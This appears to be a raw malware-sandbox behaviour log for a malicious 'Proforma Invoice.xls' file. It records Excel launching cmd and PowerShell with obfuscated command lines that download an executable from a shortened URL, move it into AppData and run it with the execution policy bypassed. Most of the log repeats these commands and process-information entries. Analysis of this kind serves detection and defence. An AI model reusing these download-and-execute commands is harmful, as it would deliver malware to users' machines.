Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5360:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5396:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5620:120:WilError_01
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{8ED223E6-2CD3-4708-A7C8-18A95E15034E} - OProcSessId.datJump to behavior
Source: Proforma Invoice.xlsOLE indicator, Workbook stream: true
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: Proforma Invoice.xlsVirustotal: Detection: 14%
Source: Proforma Invoice.xlsReversingLabs: Detection: 20%
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE 'C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE' /automation -Embedding
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb{ source: powershell.exe, 00000006.00000002.381219156.00000000005DF000.00000004.00000001.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000009.00000003.430916634.0000000007E31000.00000004.00000001.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000009.00000003.430528579.00000000095CD000.00000004.00000001.sdmp

Data Obfuscation:

barindex
Obfuscated command line foundShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
